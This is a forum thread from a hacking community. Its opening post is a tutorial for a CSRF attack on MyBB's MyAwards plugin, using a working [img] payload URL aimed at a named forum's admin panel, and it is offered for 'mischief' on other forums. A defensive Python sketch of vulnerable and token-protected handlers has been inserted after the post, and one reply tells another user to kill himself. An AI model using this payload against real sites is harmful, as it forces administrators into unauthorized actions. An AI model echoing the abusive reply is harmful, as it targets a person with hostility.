

Tutorial MyBB - MyAwards CSRF Vulnerability
MyBB - MyAwards CSRF Vulnerability #1
This is a really simple, really stupid, vulnerability I heard of a few days ago. Didn't think it was worth a post, until I received a dozen PMs that we were possibly "vulnerable". Felt like sharing, in case you guys want to cause a bunch of mischief on another forum.

  1. Figure out the ACP link for a MyBB forum using MyAwards.
  2. Post a thread with the following image code on a (modified to your needs).
    Code:
    [img]https://www.sinister.ly/admin/index.php?module=user-awards&action=awards_do_grant&awid=4&username=Oni&awreason=loldongs[/img]
  3. Wait for an administrator to view your "image".
  4. Enjoy whatever pathetic awards you might want.


Skype: oni_sl (Add)
Steam: Oni | SL (Add)

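Why the image load works and what stops it, as an added sketch that is not part of the original post or MyAwards' code: the first handler changes state on any cookie-authenticated GET, the second requires POST plus a session-bound token. The host `forum.example`, the user `alice`, the handler names and the HMAC token scheme are assumptions; the field name `my_post_key` is borrowed from MyBB's post key.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)  # per-install secret (constructed)
awards = []                           # stands in for the awards table

def post_key(session_id):
    """Anti-CSRF token bound to one admin session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def grant_vulnerable(method, url, body, session_id):
    """Pattern from the post: any request carrying the admin cookie is obeyed."""
    q = parse_qs(urlsplit(url).query)
    if q.get("action") != ["awards_do_grant"]:
        return 404
    awards.append((q["username"][0], q["awid"][0]))
    return 200

def grant_hardened(method, url, body, session_id):
    """Same action, but a state change needs POST and a valid token."""
    if parse_qs(urlsplit(url).query).get("action") != ["awards_do_grant"]:
        return 404
    if method != "POST":
        return 405  # an [img] tag can only issue a GET
    form = parse_qs(body)
    token = form.get("my_post_key", [""])[0]
    if not hmac.compare_digest(token.encode(), post_key(session_id).encode()):
        return 403  # a third-party page cannot read the admin's token
    if "username" not in form or "awid" not in form:
        return 400
    awards.append((form["username"][0], form["awid"][0]))
    return 200

def demo():
    sid = "admin-session-1"  # constructed session id
    url = "https://forum.example/admin/index.php?module=user-awards&action=awards_do_grant"
    img = url + "&awid=4&username=alice&awreason=x"  # fetched when the "image" renders
    form = "awid=4&username=alice&awreason=x&my_post_key="
    return [grant_vulnerable("GET", img, "", sid),   # 200: granted by an image load
            grant_hardened("GET", img, "", sid),     # 405
            grant_hardened("POST", url, form + "guess", sid),  # 403
            grant_hardened("POST", url, form + post_key(sid), sid)]  # 200

if __name__ == "__main__":
    print(demo())
```
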

RE: MyBB - MyAwards CSRF Vulnerability #2
Wow oni, I now see why you gave yourself that grey hat hacker award!


RE: MyBB - MyAwards CSRF Vulnerability #3
I guess you fixed this on here, right? :P

RE: MyBB - MyAwards CSRF Vulnerability #4
This is pretty funny, I gotta say.

RE: MyBB - MyAwards CSRF Vulnerability #5
(08-26-2014, 05:21 AM).Shebang Wrote: I guess you fixed this on here, right? :P

Would be pretty dumb if he wouldn't, mh? :P

RE: MyBB - MyAwards CSRF Vulnerability #6
(08-26-2014, 05:21 AM).Shebang Wrote: I guess you fixed this on here, right? :P

I was imagining someone with over 20 awards on SL as you said that :p


RE: MyBB - MyAwards CSRF Vulnerability #7
Fun fact; you can give yourself invalid awards (if you know the admin dir)

Hope you had fun removing those awards, @Oni. :P

RE: MyBB - MyAwards CSRF Vulnerability #8
(09-24-2014, 02:58 AM)Equinox Wrote: Fun fact; you can give yourself invalid awards (if you know the admin dir)

Hope you had fun removing those awards, @Oni. :P

You can go kill yourself.

RE: MyBB - MyAwards CSRF Vulnerability #9
LOL This is awesome! Great share, hahaha!
TTTEEEXXXAAASSS


RE: MyBB - MyAwards CSRF Vulnerability #10
(09-24-2014, 02:59 AM)Oni Wrote: You can go kill yourself.

no bulli allowed!

